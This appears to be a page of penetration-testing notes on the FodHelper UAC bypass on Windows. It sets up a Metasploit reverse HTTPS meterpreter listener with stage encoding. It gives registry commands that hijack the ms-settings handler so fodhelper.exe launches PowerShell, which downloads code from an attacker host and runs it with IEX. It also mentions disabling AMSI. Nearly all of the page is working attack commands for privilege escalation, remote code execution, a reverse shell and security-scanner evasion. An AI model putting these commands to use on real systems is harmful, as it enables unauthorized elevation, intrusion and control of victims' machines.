FodHelper UAC Bypass

Disable AMSI by setting registry key

 -o rev.ps1

listener:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
set EnableStageEncoding true
set StageEncoder x64/zutto_dekiru
run

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/') | IEX" -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

C:\Windows\System32\fodhelper.exe

PreviousAMSI Bypass NextJScript

Last updated 9 months ago